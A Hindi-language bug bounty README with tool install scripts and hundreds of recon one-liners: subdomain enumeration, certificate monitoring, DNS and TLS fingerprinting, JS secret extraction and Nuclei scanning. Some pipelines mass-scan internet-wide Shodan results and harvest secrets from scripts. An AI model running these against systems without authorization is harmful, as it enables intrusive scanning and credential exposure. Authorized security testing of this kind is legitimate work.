
हमारा मुख्य लक्ष्य कुछ प्रसिद्ध बग हंटर्स से टिप्स साझा करना है। रेकॉन पद्धति का उपयोग करके, हम सबडोमेन, एपीआई और टोकन ढूंढने में सक्षम होते हैं जो पहले से ही शोषण योग्य हैं, ताकि हम उन्हें रिपोर्ट कर सकें। हम Onelinetips को प्रभावित करना चाहते हैं और कमांड्स को समझाना चाहते हैं, ताकि नए हंटर्स को बेहतर समझ हो सके।
बग बाउंटी रिकॉनिसेंस का अंतिम शस्त्रागार
"हम छाया में शिकार करते हैं, कोड में विश्वास रखते हैं"
यह रिपॉजिटरी केवल शैक्षिक और अधिकृत परीक्षण के लिए है। परीक्षण से पहले हमेशा उचित प्राधिकरण प्राप्त करें।
इस रिपॉजिटरी में कोई सुरक्षा मुद्दा मिला? कृपया जिम्मेदारी से रिपोर्ट करें:
हमारा मुख्य उद्देश्य प्रसिद्ध बग हंटर्स के टिप्स साझा करना है। उन्नत रीकॉन पद्धति का उपयोग करके, हम सबडोमेन, एपीआई, टोकन और शोषण योग्य कमजोरियों की खोज करते हैं। हमारा लक्ष्य समुदाय को शक्तिशाली वन-लाइनर तकनीकों के साथ प्रभावित और शिक्षित करना है, ताकि बेहतर समझ और तेज़ परिणाम प्राप्त हो सकें।
1️⃣ उपकरण स्थापित करें |
2️⃣ रीकॉन चलाएं |
subfinder -d target.com -silent | httpx -silent | nuclei -severity critical,high
<details>
<summary><b>🎬 क्या आप एक संपूर्ण स्वचालित वर्कफ़्लो चाहते हैं? यहाँ क्लिक करें!</b></summary>
<br>```bash
# 🚀 Advanced Quick Start - Complete Recon Pipeline
TARGET="target.com"
# Subdomain enumeration with multiple sources
subfinder -d $TARGET -all -silent | \
httpx -silent -title -status-code -tech-detect -follow-redirects | \
tee subdomains_live.txt
# Deep crawling and parameter discovery
cat subdomains_live.txt | katana -silent -d 3 -jc | \
grep -E '\\.js$' | \
httpx -silent -mc 200 | \
tee js_files.txt
# Vulnerability scanning with Nuclei
nuclei -l subdomains_live.txt -severity critical,high,medium -silent -o nuclei_results.txt
# 💎 Results saved in:
# - subdomains_live.txt (Live domains)
# - js_files.txt (JavaScript files)
# - nuclei_results.txt (Vulnerabilities found)
| अनुभाग | विवरण |
|---|
| About | परियोजना अवलोकन और लक्ष्य |
| Quick Start | 5 मिनट में शुरू करें |
| Required Tools | आवश्यक टूलसेट |
| BBRF Scope DoD | DoD दायरा विन्यास |
| Subdomain Enumeration | उपडोमेन ढूंढना |
| JavaScript Recon | JS फ़ाइल विश्लेषण |
| XSS Detection | क्रॉस-साइट स्क्रिप्टिंग |
| SQL Injection | SQLi तकनीकें |
| SSRF & SSTI | सर्वर-साइड हमले |
| Web Crawling | गहरी क्रॉलिंग विधियाँ |
| Parameter Discovery | छिपे पैरामीटर |
| Content Discovery | संवेदनशील फ़ाइलें |
| Nuclei Scanning | स्वचालित स्कैनिंग |
| API Security Testing | API कमजोरियाँ |
| Cloud Security | AWS, GCP, Azure |
| Automation Scripts | उपयोग के लिए तैयार स्क्रिप्ट |
| Bash Functions | शेल उत्पादकता |
| New Oneliners 2026 | CVE-2026 शोषण और तकनीकें |
| Oneliners 2024-2025 | पिछली तकनीकें |
| February 2026 CVE Discovery | नवीनतम CVE रिकॉन वनलाइनर्स |
| Search Engines | हैकर खोज इंजन |
| Wordlists | सर्वश्रेष्ठ वर्डलिस्ट |
| Resources | पुस्तकें, पाठ्यक्रम, ब्लॉग |
|
💎 क्यूरेटेड कमांड असली हंटर्स द्वारा युद्ध-परीक्षित |
🎯 पूर्ण पद्धति रीकॉन से शोषण तक |
🔄 निरंतर अपडेटेड साप्ताहिक नई तकनीकें |
🌍 सामुदायिक संचालित दुनिया भर के शीर्ष हंटर्स |
| श्रेणी | संख्या | स्थिति |
|---|
| वन-लाइनर्स | 400+ | ✅ सक्रिय |
| तकनीकें | 50+ | ✅ सक्रिय |
| कवर किए गए उपकरण | 100+ | ✅ सक्रिय |
| CVE उदाहरण | 20+ | ✅ सक्रिय |
| DoD डोमेन | 19 | ✅ सक्रिय |
| योगदानकर्ता | बढ़ रहे हैं | 🚀 बढ़ रहे हैं |
| अंतिम अपडेट | 2026 | ✅ वर्तमान |
3️⃣ बग ढूंढें |
| टिप | विवरण |
|---|
| 🔑 | परीक्षण से पहले हमेशा उचित अनुमति लें |
| 📝 | अपने निष्कर्षों के विस्तृत नोट्स रखें |
| 🛠️ | स्वचालित उपकरणों से शुरू करें, फिर मैन्युअल परीक्षण करें |
| 💰 | पहले उच्च-प्रभाव वाली कमजोरियों पर ध्यान दें |
| 🤝 | समुदाय से जुड़ें और दूसरों से सीखें |
| श्रेणी | उपकरण | स्थापना |
|---|
| उपडोमेन | Subfinder, Amass, Assetfinder, Findomain, Chaos | go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest |
| HTTP प्रॉबिंग | Httpx, Httprobe | go install github.com/projectdiscovery/httpx/cmd/httpx@latest |
| क्रॉलिंग | Katana, Gospider, Hakrawler, Cariddi | go install github.com/projectdiscovery/katana/cmd/katana@latest |
| URLs | Gau, Waybackurls, Waymore | go install github.com/lc/gau/v2/cmd/gau@latest |
| स्कैनिंग | Nuclei, Jaeles, Naabu | go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest |
| XSS | Dalfox, XSStrike, Kxss, Airixss | go install github.com/hahwul/dalfox/v2@latest |
| SQLi | SQLMap, Ghauri | pip install sqlmap ghauri |
| उपयोगिताएँ | Anew, Qsreplace, Unfurl, Gf, Uro | go install github.com/tomnomnom/anew@latest |
| फ़ज़िंग | Ffuf, Feroxbuster | go install github.com/ffuf/ffuf/v2@latest |
| JS विश्लेषण | Subjs, LinkFinder, SecretFinder, Jsubfinder | go install github.com/lc/subjs@latest |
| प्रमाणपत्र निगरानी | Certstream, Certstream-go | pip install certstream |
| DNS | Dnsx, Shuffledns, PureDNS, MassDNS, Dnsgen | go install github.com/projectdiscovery/dnsx/cmd/dnsx@latest |
| रिवर्स DNS | Hakrevdns, Prips | go install github.com/hakluke/hakrevdns@latest |
| API खोज | Arjun, x8, ParamSpider | pip install arjun |
| स्क्रीनशॉट | Gowitness, Eyewitness | go install github.com/sensepost/gowitness@latest |
| क्लाउड | AWS CLI, CloudEnum, S3Scanner | pip install awscli |
| OSINT | Shodan CLI, Censys, Metabigor | pip install shodan censys |
| Git रिकॉन | Trufflehog, Gitrob, Github-Subdomains | go install github.com/trufflesecurity/trufflehog/v3@latest |
| स्कोप प्रबंधन | BBRF | pip install bbrf |
sudo apt update && sudo apt install -y
jq
curl
wget
git
python3
python3-pip
golang-go
nmap
masscan
chromium-browser
parallel
whois
dnsutils
libpcap-dev
build-essential
brew install jq curl wget git python3 go nmap masscan chromium parallel whois bind
### Go पर्यावरण सेटअप```bash
# Add to ~/.bashrc or ~/.zshrc
export GOPATH=$HOME/go
export GOROOT=/usr/local/go
export PATH=$PATH:$GOPATH/bin:$GOROOT/bin
# Reload shell
source ~/.bashrc # or source ~/.zshrc
#!/bin/bash
echo "[*] Installing Go tools..." go_tools=( # ProjectDiscovery "github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest" "github.com/projectdiscovery/httpx/cmd/httpx@latest" "github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest" "github.com/projectdiscovery/katana/cmd/katana@latest" "github.com/projectdiscovery/naabu/v2/cmd/naabu@latest" "github.com/projectdiscovery/dnsx/cmd/dnsx@latest" "github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest" "github.com/projectdiscovery/chaos-client/cmd/chaos@latest" # Tomnomnom "github.com/tomnomnom/waybackurls@latest" "github.com/tomnomnom/anew@latest" "github.com/tomnomnom/qsreplace@latest" "github.com/tomnomnom/unfurl@latest" "github.com/tomnomnom/gf@latest" "github.com/tomnomnom/assetfinder@latest" "github.com/tomnomnom/httprobe@latest" # Fuzzing & Crawling "github.com/ffuf/ffuf/v2@latest" "github.com/jaeles-project/gospider@latest" "github.com/hakluke/hakrawler@latest" "github.com/hakluke/hakrevdns@latest" # Security "github.com/hahwul/dalfox/v2@latest" "github.com/lc/gau/v2/cmd/gau@latest" "github.com/lc/subjs@latest" # Screenshots & Utils "github.com/sensepost/gowitness@latest" "github.com/d3mondev/puredns/v2@latest" "github.com/j3ssie/metabigor@latest" "github.com/Emoe/kxss@latest" "github.com/ferreiraklet/airixss@latest" "github.com/edoardottt/cariddi/cmd/cariddi@latest" "github.com/trufflesecurity/trufflehog/v3@latest" )
for tool in "${go_tools[@]}"; do echo "[+] Installing $tool" go install -v "$tool" 2>/dev/null done
echo "[✓] Go tools installed!"
### त्वरित इंस्टॉल स्क्रिप्ट - पायथन उपकरण```bash
#!/bin/bash
# One-click install for all Python tools
echo "[*] Installing Python tools..."
pip3 install --upgrade pip
pip3 install \
certstream \
sqlmap \
ghauri \
uro \
arjun \
paramspider \
shodan \
censys \
bbrf \
dnsgen \
waymore \
xsstrike \
s3scanner \
cloud_enum \
trufflehog
echo "[✓] Python tools installed!"
#!/bin/bash
echo "[*] Installing Rust tools..."
if ! command -v cargo &> /dev/null; then curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y source $HOME/.cargo/env fi
cargo install feroxbuster
echo "[✓] Rust tools installed!"
### त्वरित इंस्टॉल स्क्रिप्ट - बाहरी उपकरण```bash
#!/bin/bash
# Install tools that require cloning
echo "[*] Installing external tools..."
TOOLS_DIR="$HOME/tools"
mkdir -p $TOOLS_DIR && cd $TOOLS_DIR
# LinkFinder
git clone https://github.com/GerbenJavado/LinkFinder.git
cd LinkFinder && pip3 install -r requirements.txt && cd ..
# SecretFinder
git clone https://github.com/m4ll0k/SecretFinder.git
cd SecretFinder && pip3 install -r requirements.txt && cd ..
# Findomain
wget https://github.com/Findomain/Findomain/releases/latest/download/findomain-linux.zip
unzip findomain-linux.zip && chmod +x findomain && sudo mv findomain /usr/local/bin/
# MassDNS
git clone https://github.com/blechschmidt/massdns.git
cd massdns && make && sudo mv bin/massdns /usr/local/bin/ && cd ..
# Amass
go install -v github.com/owasp-amass/amass/v4/...@master
# GF Patterns
git clone https://github.com/1ndianl33t/Gf-Patterns.git
mkdir -p ~/.gf && cp Gf-Patterns/*.json ~/.gf/
echo "[✓] External tools installed!"
#!/bin/bash
echo "╔══════════════════════════════════════════════════════════╗" echo "║ KingOfBugBounty - Complete Tool Installation ║" echo "╚══════════════════════════════════════════════════════════╝"
echo "[1/5] Installing system dependencies..." sudo apt update && sudo apt install -y jq curl wget git python3 python3-pip golang-go nmap masscan chromium-browser parallel whois dnsutils libpcap-dev build-essential
echo "[2/5] Setting up Go environment..." echo 'export GOPATH=$HOME/go' >> ~/.bashrc echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.bashrc source ~/.bashrc
echo "[3/5] Installing Go tools..." go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest go install -v github.com/projectdiscovery/katana/cmd/katana@latest go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest go install -v github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest go install -v github.com/tomnomnom/waybackurls@latest go install -v github.com/tomnomnom/anew@latest go install -v github.com/tomnomnom/qsreplace@latest go install -v github.com/tomnomnom/unfurl@latest go install -v github.com/tomnomnom/gf@latest go install -v github.com/tomnomnom/assetfinder@latest go install -v github.com/ffuf/ffuf/v2@latest go install -v github.com/hahwul/dalfox/v2@latest go install -v github.com/lc/gau/v2/cmd/gau@latest go install -v github.com/jaeles-project/gospider@latest go install -v github.com/hakluke/hakrawler@latest go install -v github.com/hakluke/hakrevdns@latest go install -v github.com/sensepost/gowitness@latest go install -v github.com/d3mondev/puredns/v2@latest go install -v github.com/owasp-amass/amass/v4/...@master
echo "[4/5] Installing Python tools..." pip3 install certstream sqlmap ghauri uro arjun shodan censys bbrf dnsgen waymore
echo "[5/5] Installing Rust tools..." if ! command -v cargo &> /dev/null; then curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y source $HOME/.cargo/env fi cargo install feroxbuster
nuclei -update-templates
echo "" echo "╔══════════════════════════════════════════════════════════╗" echo "║ ✓ Installation Complete! ║" echo "╚══════════════════════════════════════════════════════════╝" echo "" echo "Run 'source ~/.bashrc' to reload your environment"
### वर्डलिस्ट्स स्थापना```bash
#!/bin/bash
# Install essential wordlists
WORDLIST_DIR="$HOME/wordlists"
mkdir -p $WORDLIST_DIR && cd $WORDLIST_DIR
# SecLists
git clone https://github.com/danielmiessler/SecLists.git
# Assetnote Wordlists
wget -r --no-parent -R "index.html*" https://wordlists-cdn.assetnote.io/data/ -nH
# OneListForAll
git clone https://github.com/six2dez/OneListForAll.git
# Resolvers
wget https://raw.githubusercontent.com/trickest/resolvers/main/resolvers.txt -O resolvers.txt
wget https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt -O resolvers-trusted.txt
echo "[✓] Wordlists installed in $WORDLIST_DIR"
#!/bin/bash
echo "Checking installed tools..."
tools=("subfinder" "httpx" "nuclei" "katana" "naabu" "dnsx" "ffuf" "feroxbuster" "dalfox" "gau" "waybackurls" "anew" "qsreplace" "gf" "gospider" "hakrawler" "amass" "gowitness" "certstream" "sqlmap" "arjun" "shodan")
for tool in "${tools[@]}"; do if command -v $tool &> /dev/null; then echo "[✓] $tool" else echo "[✗] $tool - NOT FOUND" fi done
</details>
---
## 🎯 BBRF Scope DoD```bash
# Add all DoD domains to BBRF scope
bbrf inscope add '*.af.mil' '*.osd.mil' '*.marines.mil' '*.pentagon.mil' '*.disa.mil' '*.health.mil' '*.dau.mil' '*.dtra.mil' '*.ng.mil' '*.dds.mil' '*.uscg.mil' '*.army.mil' '*.dcma.mil' '*.dla.mil' '*.dtic.mil' '*.yellowribbon.mil' '*.socom.mil' '*.spaceforce.mil' '*.ussf.mil'
subfinder -d target.com -all -silent | anew subs.txt amass enum -passive -d target.com | anew subs.txt assetfinder -subs-only target.com | anew subs.txt chaos -d target.com -silent | anew subs.txt findomain -t target.com -q | anew subs.txt cat subs.txt | httpx -silent -threads 200 | anew alive.txt
### 💀 प्रमाणपत्र पारदर्शिता लॉग्स```bash
# ☠️ crt.sh extraction
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | httpx -silent
pip install certstream && python3 -c "import certstream; certstream.listen_for_events(lambda msg, ctx: print(msg['data']['leaf_cert']['subject']['CN']) if 'target' in str(msg.get('data',{}).get('leaf_cert',{}).get('subject',{}).get('CN','')) else None, url='wss://certstream.calidog.io/')"
### 💀 Certstream के साथ Domain Filter```bash
# ☠️ Real-time cert monitoring filtered by domain keywords
certstream --full | jq -r 'select(.data.leaf_cert.subject.CN != null) | .data.leaf_cert.subject.CN' | grep -iE "(target|company|brand)" | anew certstream_targets.txt
certstream --full | jq -r '.data.leaf_cert.extensions.subjectAltName // empty' | tr ',' '\n' | sed 's/DNS://g' | grep -E "target.com$" | sort -u | anew certstream_subs.txt
### 💀 Certstream + httpx लाइव पाइपलाइन```bash
# ☠️ Real-time cert discovery -> immediate alive check
certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' 2>/dev/null | grep -iE "target" | sort -u | while read domain; do echo "$domain" | httpx -silent -timeout 3 | anew live_certs.txt; done
certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep -iE "(paypal|apple|google|microsoft|amazon|facebook|netflix|bank)" | grep -vE ".(paypal|apple|google|microsoft|amazon|facebook|netflix).com$" | anew phishing_certs.txt
### 💀 Certstream के साथ Nuclei Auto-Scan```bash
# ☠️ Real-time cert discovery -> automatic vulnerability scan
certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' | grep -E "\.target\.com$" | sort -u | while read domain; do echo "https://$domain" | nuclei -t /nuclei-templates/technologies/ -silent; done
timeout 3600 bash -c 'certstream --full | jq -r ".data.leaf_cert.all_domains[]? // empty" | grep -E ".(gov|mil|edu)$" | anew gov_mil_edu_certs.txt' &
### 💀 Certstream वाइल्डकार्ड प्रमाणपत्र शिकारी```bash
# ☠️ Find wildcard certificates (*.domain.com) in real-time
certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep "^\*\." | sed 's/^\*\.//' | sort -u | anew wildcard_domains.txt
certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep -iE "target" | while read domain; do IP=$(dig +short "$domain" | head -1); [ -n "$IP" ] && echo "$domain,$IP,$(shodan host $IP 2>/dev/null | head -3 | tr '\n' ' ')"; done | anew cert_shodan.txt
### 💀 Certstream JSON लॉगर टाइमस्टैम्प के साथ```bash
# ☠️ Full certificate logging with timestamps for analysis
certstream --full | jq -c '{timestamp: now | strftime("%Y-%m-%d %H:%M:%S"), cn: .data.leaf_cert.subject.CN, domains: .data.leaf_cert.all_domains, issuer: .data.leaf_cert.issuer.O}' | grep -i "target" | tee -a certstream_log.json
TARGETS="hackerone|bugcrowd|intigriti|yeswehack"; certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' | grep -iE "$TARGETS" | anew bb_new_assets.txt &
### 💀 Shodan + Nuclei Pipeline```bash
# ☠️ Shodan recon -> Nuclei scan
shodan domain target.com | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high
shodan search "Clawdbot" --fields ip_str,port,hostnames,org | awk '{print $1":"$2}' | anew clawdbot_targets.txt
#### ⚡ 2. Clawdbot HTTP हेडर खोज```bash
# 💀 Find servers with Clawdbot in HTTP headers
shodan search "http.headers:Clawdbot" --fields ip_str,port,http.title | tee clawdbot_http.txt | wc -l && echo "targets found"
shodan search "http.user_agent:Clawdbot" --fields ip_str,port,org,hostnames | awk -F'\t' '{print "https://"$1":"$2" - "$3}' | anew clawdbot_ua.txt
#### ⚡ 4. Clawdbot + Nuclei शोषण पाइपलाइन```bash
# 💀 Mass Clawdbot discovery -> httpx alive -> Nuclei scan
shodan search "Clawdbot" --fields ip_str,port --limit 1000 | awk '{print $1":"$2}' | httpx -silent | nuclei -t ~/nuclei-templates/ -severity critical,high -o clawdbot_vulns.txt
shodan search "Clawdbot" --fields ip_str,port,os,product,version,org | sort -t$'\t' -k4 | anew clawdbot_fingerprint.txt
#### ⚡ 6. Clawdbot ASN वितरण विश्लेषण```bash
# 💀 Map Clawdbot instances by ASN for targeted reconnaissance
shodan search "Clawdbot" --fields ip_str,asn,org | awk '{print $2}' | sort | uniq -c | sort -rn | head -20 | tee clawdbot_asn_stats.txt
for country in US BR DE FR GB RU CN JP KR IN; do echo "=== $country ===" && shodan search "Clawdbot country:$country" --fields ip_str,port,city --limit 100 | anew clawdbot_${country}.txt; done
#### ⚡ 8. Clawdbot + पोर्ट रेंज स्कैन```bash
# 💀 Discover Clawdbot on common web ports
shodan search "Clawdbot port:80,443,8080,8443,8000,3000,5000" --fields ip_str,port,http.server | awk '{print $1":"$2}' | httpx -silent -status-code -title | anew clawdbot_webports.txt
shodan search "Clawdbot ssl:true" --fields ip_str,port,ssl.cert.subject.CN,ssl.cert.issuer.O | sort -u | anew clawdbot_ssl.txt
#### ⚡ 10. Clawdbot रियलटाइम मॉनिटर + अलर्ट```bash
# 💀 Continuous monitoring for new Clawdbot instances
while true; do shodan search "Clawdbot" --fields ip_str,port,timestamp --limit 50 | sort -t$'\t' -k3 -r | head -10 | anew clawdbot_new.txt && sleep 3600; done &
echo 'target_org' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]+.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew'
### 💀 DNS Bruteforce with Shuffledns```bash
shuffledns -d target.com -w wordlist.txt -r resolvers.txt -silent | httpx -silent | anew
subfinder -d target.com -recursive -all -silent | dnsx -silent | httpx -silent | anew recursive_subs.txt
### 💀 Passive DNS - एकाधिक स्रोत```bash
# ☠️ HackerTarget
curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1 | anew subs.txt
# ☠️ RapidDNS
curl -s "https://rapiddns.io/subdomain/target.com?full=1" | grep -oP '(?<=target="_blank">)[^<]+' | grep "target.com" | anew subs.txt
# ☠️ Riddler.io
curl -s "https://riddler.io/search/exportcsv?q=pld:target.com" | grep -oP '\b([a-zA-Z0-9](https://github.com/kingofbugbounty/kingofbugbountytips/blob/master/%5Ba-zA-Z0-9-%5D%2A%5Ba-zA-Z0-9%5D)?\.)+target\.com\b' | anew subs.txt
# ☠️ AlienVault OTX
curl -s "https://otx.alienvault.com/api/v1/indicators/domain/target.com/passive_dns" | jq -r '.passive_dns[].hostname' 2>/dev/null | sort -u | anew subs.txt
# ☠️ URLScan.io
curl -s "https://urlscan.io/api/v1/search/?q=domain:target.com" | jq -r '.results[].page.domain' 2>/dev/null | sort -u | anew subs.txt
github-subdomains -d target.com -t YOUR_GITHUB_TOKEN -o github_subs.txt
### 💀 Censys सबडोमेन खोज```bash
# ☠️ Using Censys API
censys search "target.com" --index-type hosts | jq -r '.[] | .name' | sort -u | anew censys_subs.txt
curl -s "https://api.securitytrails.com/v1/domain/target.com/subdomains" -H "APIKEY: YOUR_API_KEY" | jq -r '.subdomains[]' | sed 's/$/.target.com/' | anew subs.txt
### 💀 Wayback Machine उपडोमेन```bash
# ☠️ Extract subdomains from Wayback Machine
curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's/\/.*//g' | sort -u | anew wayback_subs.txt
curl -s "https://index.commoncrawl.org/CC-MAIN-2023-50-index?url=*.target.com&output=json" | jq -r '.url' | sed -e 's_https*://__' -e 's//.*//g' | sort -u | anew commoncrawl_subs.txt
### 💀 VirusTotal Subdomains```bash
# ☠️ VirusTotal API
curl -s "https://www.virustotal.com/vtapi/v2/domain/report?apikey=YOUR_API_KEY&domain=target.com" | jq -r '.subdomains[]' 2>/dev/null | anew vt_subs.txt
dig axfr @ns1.target.com target.com | grep -E "^[a-zA-Z0-9]" | awk '{print $1}' | sed 's/.$//' | anew zone_transfer.txt
### 💀 रिवर्स आईपी लुकअप```bash
# ☠️ Find domains on same IP
host target.com | awk '/has address/ {print $4}' | xargs -I@ sh -c 'curl -s "https://api.hackertarget.com/reverseiplookup/?q=@"' | anew reverse_ip.txt
whois -h whois.radb.net -- '-i origin AS12345' | grep -Eo "([0-9.]+){4}/[0-9]+" | xargs -I@ sh -c 'nmap -sL @ | grep "report for" | cut -d" " -f5' | httpx -silent | anew bgp_hosts.txt
### 💀 IP रेंज से PTR रिकॉर्ड्स```bash
# ☠️ Mass PTR lookup
prips 192.168.1.0/24 | xargs -P50 -I@ sh -c 'host @ 2>/dev/null | grep "pointer" | cut -d" " -f5' | sed 's/\.$//' | anew ptr_subs.txt
(subfinder -d target.com -all -silent; amass enum -passive -d target.com; assetfinder -subs-only target.com; findomain -t target.com -q; chaos -d target.com -silent; curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/*.//g'; curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1; curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's//.*//g') | sort -u | httpx -silent -threads 100 | anew mega_subs.txt
### 💀 उपडोमेन क्रमपरिवर्तन/ब्रूटफोर्स```bash
# ☠️ Generate permutations and resolve
cat subs.txt | dnsgen - | shuffledns -d target.com -r resolvers.txt -silent | anew permutation_subs.txt
puredns bruteforce wordlist.txt target.com -r resolvers.txt -w puredns_subs.txt
### 💀 TLS/SSL Certificate Grabber```bash
# ☠️ Extract subdomains from SSL certificates
echo target.com | httpx -silent | xargs -I@ sh -c 'echo | openssl s_client -connect @:443 2>/dev/null | openssl x509 -noout -text | grep -oP "DNS:[^\s,]+" | sed "s/DNS://"' | sort -u | anew ssl_subs.txt
curl -s https://target.com/favicon.ico | md5sum | awk '{print $1}' | xargs -I@ shodan search "http.favicon.hash:@" --fields ip_str,hostnames | anew favicon_hosts.txt
### 💀 Google Dork उपडोमेन खोज```bash
# ☠️ Use Google dorks (manual or with tools)
# site:*.target.com -www
# inurl:target.com
echo target.com | tlsx -san -cn -so -sv -ss -serial -hash md5 -jarm -ja3 -wc -tps -ve -ce -ct -cdn -silent | tee tlsx_full.txt
### 🔐 SANs के माध्यम से उपडोमेन खोज```bash
# 🔐 Extract all subdomains from certificate SANs
subfinder -d target.com -silent | tlsx -san -cn -silent -resp-only | grep -oE "[a-zA-Z0-9.-]+\.target\.com" | sort -u | anew san_subdomains.txt
cat hosts.txt | tlsx -expired -silent -cn -so | tee expired_certs.txt
### 🔐 स्व-हस्ताक्षरित प्रमाणपत्र पहचान```bash
# 🔐 Identify self-signed certificates (potential security issue)
cat hosts.txt | tlsx -self-signed -silent -cn -so -hash sha256 | tee self_signed.txt
cat hosts.txt | tlsx -tls-version -silent | grep -E "(tls10|tls11)" | tee weak_tls_versions.txt
### 🔐 JARM फिंगरप्रिंटिंग पाइपलाइन```bash
# 🔐 JARM fingerprint for server identification and correlation
subfinder -d target.com -silent | httpx -silent | tlsx -jarm -silent -json | jq -r '[.host, .jarm_hash] | @tsv' | sort -k2 | anew jarm_fingerprints.txt
cat hosts.txt | tlsx -so -serial -hash sha256 -ve -ce -json -silent | jq -r '[.host, .issuer_cn, .not_after, .serial] | @tsv' | anew cert_chain_analysis.txt
### 🔐 बड़े पैमाने पर TLS Scan के साथ Cipher Enumeration```bash
# 🔐 Full cipher suite enumeration + TLS version
subfinder -d target.com -silent | httpx -silent | tlsx -cipher -tls-version -silent -json | jq -r '[.host, .version, .cipher] | @tsv' | anew cipher_enum.txt
cat hosts.txt | tlsx -mismatched -cn -san -silent | tee mismatched_certs.txt
### 🔐 अंतिम TLS रिकॉन पाइपलाइन```bash
# 🔐 Complete TLS intelligence gathering
subfinder -d target.com -all -silent | httpx -silent -p 443,8443,4443,9443 | tlsx -san -cn -so -sv -ss -serial -expired -self-signed -mismatched -tls-version -jarm -hash sha256 -json -silent | jq -c '{host: .host, cn: .subject_cn, san: .san, issuer: .issuer_cn, expired: .expired, self_signed: .self_signed, tls: .version, jarm: .jarm_hash}' | tee tlsx_full_recon.json
subfinder -d target.com -silent | dnsx -silent -a -resp-only -wd target.com | sort -u | anew resolved_ips.txt
### 🌐 2. बहु-रिकॉर्ड प्रकार DNS एनुमरेशन```bash
# 🌐 Query A, AAAA, CNAME, MX, NS, TXT records simultaneously
echo target.com | dnsx -silent -a -aaaa -cname -mx -ns -txt -resp | tee full_dns_records.txt
subfinder -d target.com -silent | dnsx -silent -cname -resp-only | grep -iE "(s3|cloudfront|herokuapp|github|azure|shopify|fastly|pantheon|zendesk|readme|ghost|surge|bitbucket|wordpress|tumblr)" | anew cname_takeover_candidates.txt
### 🌐 4. IP रेंज पर रिवर्स DNS (PTR)```bash
# 🌐 Discover hidden hosts via reverse DNS lookups
prips 192.168.1.0/24 | dnsx -silent -ptr -resp-only | anew ptr_discovered_hosts.txt
cat domains.txt | dnsx -silent -mx -resp | awk '{print $1, $2}' | sort -u | tee mx_records.txt && cat domains.txt | dnsx -silent -txt -resp | grep -i "spf" | anew spf_records.txt
### 🌐 6. NS Records + DNS Zone Transfer Check```bash
# 🌐 Enumerate nameservers and check for misconfigured zone transfers
cat domains.txt | dnsx -silent -ns -resp-only | tee nameservers.txt && cat nameservers.txt | xargs -I@ -P10 sh -c 'host -t axfr target.com @ 2>&1 | grep -v "failed\|timed out" && echo "[ZONE TRANSFER] @"' | anew zone_transfers.txt
cat wordlist.txt | sed 's/$/.target.com/' | dnsx -silent -r resolvers.txt -rl 500 -t 200 -retry 3 -resp-only | anew bruteforced_subs.txt
### 🌐 8. उन्नत पार्सिंग के लिए JSON आउटपुट```bash
# 🌐 Full DNS recon with JSON output for pipeline integration
subfinder -d target.com -silent | dnsx -silent -a -aaaa -cname -mx -ns -txt -ptr -resp -json | jq -c '{host: .host, a: .a, aaaa: .aaaa, cname: .cname, mx: .mx, ns: .ns, txt: .txt}' | tee dns_full_recon.json
subfinder -d target.com -silent | dnsx -silent -a -resp-only | sort -u | tee target_ips.txt | xargs -I{} sh -c 'whois {} 2>/dev/null | grep -iE "(netname|orgname|asn|origin)" | head -5' | anew asn_info.txt
### 🌐 10. अंतिम DNS रीकॉन पाइपलाइन```bash
# 🌐 Complete DNS intelligence gathering
domain="target.com"; subfinder -d $domain -all -silent | tee subs_$domain.txt | dnsx -silent -a -aaaa -cname -mx -ns -txt -resp -json -o dns_records_$domain.json; cat subs_$domain.txt | dnsx -silent -cname -resp-only | grep -iE "(s3|cloudfront|azure|github)" | anew takeover_$domain.txt; cat dns_records_$domain.json | jq -r '.a[]?' | sort -u | dnsx -silent -ptr -resp-only | anew ptr_$domain.txt; echo "[+] DNS Recon Complete: $(wc -l < subs_$domain.txt) subdomains | $(cat dns_records_$domain.json | wc -l) records"
🎯 प्रो टिप: बेहतर प्रदर्शन के लिए कस्टम रिज़ॉल्वर का उपयोग करें:
dnsx -r resolvers.txt -rl 1000
subfinder -d target.com -silent | httpx -silent | katana -d 5 -jc -silent | grep -iE '.js$' | anew js.txt
### JS से रहस्य निकालें```bash
cat js.txt | httpx -silent -sr -srd js_files/ && nuclei -t exposures/ -target js.txt
cat js.txt | xargs -I@ -P10 bash -c 'python3 linkfinder.py -i @ -o cli 2>/dev/null' | anew endpoints.txt
### SecretFinder बड़े पैमाने पर स्कैन```bash
cat js.txt | xargs -I@ -P5 python3 SecretFinder.py -i @ -o cli | anew secrets.txt
cat file.js | grep -oE "var\s+\w+\s*=\s*['"][^'"]+['"]" | sort -u
